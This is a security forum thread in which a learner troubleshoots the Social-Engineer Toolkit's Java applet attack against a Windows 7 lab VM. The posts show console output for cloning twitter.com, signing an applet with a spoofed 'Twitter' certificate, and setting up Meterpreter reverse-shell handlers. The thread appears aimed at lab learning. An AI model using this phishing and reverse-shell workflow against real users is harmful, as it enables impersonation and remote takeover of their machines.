Results 1 to 7 of 7

Thread: SET & Windows 7

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default SET & Windows 7

    I am running BT 5 and Windows 7(x64) no patched in VM and the 2 have Bridged adapter set up. I am learning SET and I am trying to use the Java applet attack vector. Java is installed, the firewall is off and there is no AV in Windows 7. I was wondering which payload I should use? I would like to have a meterpreter session so I choose " windows/x64/meterpreter/reverse_tcp " and then later " windows/x64/meterpreter/bind_tcp " payloads without success .
    I am using IE8 and Mozilla firefox 8. When I click on the ip address the page keeps reloading? and Is it possible to use an URL instead of the ip address?

    Below the MSF output received :

    Code:
    [*] Processing src/program_junk/meta_config for ERB directives.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    msf  exploit(handler) >[*] Started reverse handler on 0.0.0.0:443[*] Starting the payload handler...
    Thanks for the assistance

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    Do you have java installed on your Win7 ?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    7

    Default Re: SET & Windows 7

    It seems like your Windows 7 VM does not have Java installed. When you try the Java Applet attack on a machine without Java you get a bootloop (where the page reloads endlessly). So make sure Java is installed and if you still have the same trouble after the Java install update SET to the latest version. There were some changes made to Set that should clear up the problem.

    Hope this helps man.
    Last edited by sickness; 11-26-2011 at 07:55 PM. Reason: Leave that part out.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default Re: SET & Windows 7

    As mentioned in the post , Java is installed in Win7 here the result from cmd
    Code:
    C:\Users\student1>java -version
    java version "1.6.0_29"
    Java(TM) SE Runtime Environment (build 1.6.0_29-b11)
    Java HotSpot(TM) 64-Bit Server VM (build 20.4-b02, mixed mode)
    Maybe,would you recommend me another method to check Java?

    And the SET version is 2.4.2. I tried again and I am still having a bootloop.

    Thanks for the assistance

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    Have you updated SET to it's latest version ? Also could you provide all your konsole commands ?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  6. #6
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default Re: SET & Windows 7

    I have update SET & even Metasploit. The SET version is 2.4.2 and the Codename: 'Renegade'. I have tried different payload for x64 and nothing. below is the console command

    Code:
     
     
       Select from the menu:
    
       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) Third Party Modules
    
      99) Return back to the main menu.
    
    set> 2
    
     The Web Attack module is  a unique way of utilizing multiple web-based attacks
     in order to compromise the intended victim.
    
     The Java Applet Attack method will spoof a Java Certificate and deliver a 
     metasploit based payload. Uses a customized java applet created by Thomas
     Werth to deliver the payload.
    
     
    
        1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Man Left in the Middle Attack Method
       6) Web Jacking Attack Method
       7) Multi-Attack Web Method
       8) Victim Web Profiler
       9) Create or import a CodeSigning Certificate
    
      99) Return to Main Menu
    
    set:webattack>1
    
     The first method will allow SET to import a list of pre-defined web 
     applications that it can utilize within the attack.
    
     The second method will completely clone a website of your choosing
     and allow you to utilize the attack vectors within the completely
     same web application you were attempting to clone.
    
     The third method allows you to import your own website, note that you
     should only have an index.html when using the import website
     functionality.
       
       1) Web Templates
       2) Site Cloner
       3) Custom Import
    
      99) Return to Webattack Menu
    
    set:webattack>2
    [-] NAT/Port Forwarding can be used in the cases where your SET machine is
    [-] not externally exposed and may be a different IP address than your reverse listener.
    set> Are you using NAT/Port Forwarding [yes|no]: no
    [-] Enter the IP address of your interface IP or if your using an external IP, what
    [-] will be used for the connection back and to house the web server (your interface address)
    set:webattack> IP address for the reverse connection:192.168.1.106
    
     Simply enter in the required fields, easy example below:
    
     Name: FakeCompany
     Organization: Fake Company
     Organization Name: Fake Company
     City: Cleveland
     State: Ohio
     Country: US
     Is this correct: yes
    
    [!] *** WARNING ***
    [!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk
    [!] *** WARNING ***
    What is your first and last name?
      [Unknown]:  Twitter
    What is the name of your organizational unit?
      [Unknown]:  Twitter
    What is the name of your organization?
      [Unknown]:  Twitter
    What is the name of your City or Locality?
      [Unknown]:  Auckland
    What is the name of your State or Province?
      [Unknown]:  CA
    What is the two-letter country code for this unit?
      [Unknown]:  US
    Is CN=Twitter, OU=Twitter, O=Twitter, L=Auckland, ST=CA, C=US correct?
      [no]:  yes
    
    
    Warning: 
    The signer certificate will expire within six months.[*] Java Applet is now signed and will be imported into the website
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:http://www.twitter.com
    [*] Cloning the website: http://www.twitter.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: Iwspj6[*] Malicious java applet website prepped for deployment
    
    
    What payload do you want to generate:
    
      Name:                                       Description:
    
       1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
       2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
       3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
       4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
       5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
       6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
       7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
       8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
       9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
      10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
      11) SE Toolkit Interactive Shell            New custom interactive reverse shell designed for SET
      12) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
      13) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
      14) Import your own executable              Specify a path for your own executable
    
    set:payloads>7
    set:payloads> PORT of the listener [443]:443
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/x64/meterpreter/reverse_tcp
     Length: 422
    Options: {"LHOST"=>"192.168.1.106", "LPORT"=>"443"}[*] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Printing the x64 based encoded code...
    I erased it because it was trigger a security alert[*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys...[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...[*] Apache appears to be running, moving files into Apache's home
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
    [--] Apache web server is currently in use for performance. [--]
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***
    
                              ########                  #
                          #################            #
                       ######################         #
                      #########################      #
                    ############################
                   ##############################
                   ###############################
                  ###############################
                  ##############################
                                  #    ########   #
                     ##        ###        ####   ##
                                          ###   ###
                                        ####   ###
                   ####          ##########   ####
                   #######################   ####
                     ####################   ####
                      ##################  ####
                        ############      ##
                           ########        ###
                          #########        #####
                        ############      ######
                       ########      #########
                         #####       ########
                           ###       #########
                          ######    ############
                         #######################
                         #   #   ###  #   #   ##
                         ########################
                          ##     ##   ##     ##
    
    
    
           =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
    + -- --=[ 767 exploits - 405 auxiliary - 119 post
    + -- --=[ 228 payloads - 27 encoders - 8 nops
           =[ svn r14325 updated yesterday (2011.11.30)
    [*] Processing src/program_junk/meta_config for ERB directives.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    msf  exploit(handler) > [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
    I sent an email directly from a Gmail account to another one that why you do not see any email.
    Thanks for the assistance

    Edit:

    Hi everybody,

    I was able to solve my problem. I think the problem was regarding the payload I was using before the " Windows Meterpreter Reverse_TCP X64 ". instead of that I used the " Windows Reverse_TCP Meterpreter " and it worked.

    So I am glad it worked but it generates a new question? why is the payload designed for the x64 architecture did not work while the x86 did ?

    Thanks
    Last edited by sickness; 12-03-2011 at 08:41 PM.

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    I might be wrong but from what I remember Java doesn't have a x64 version.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. Replies: 8
    Last Post: 08-29-2011, 04:11 AM
  2. Replies: 3
    Last Post: 06-30-2010, 07:06 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •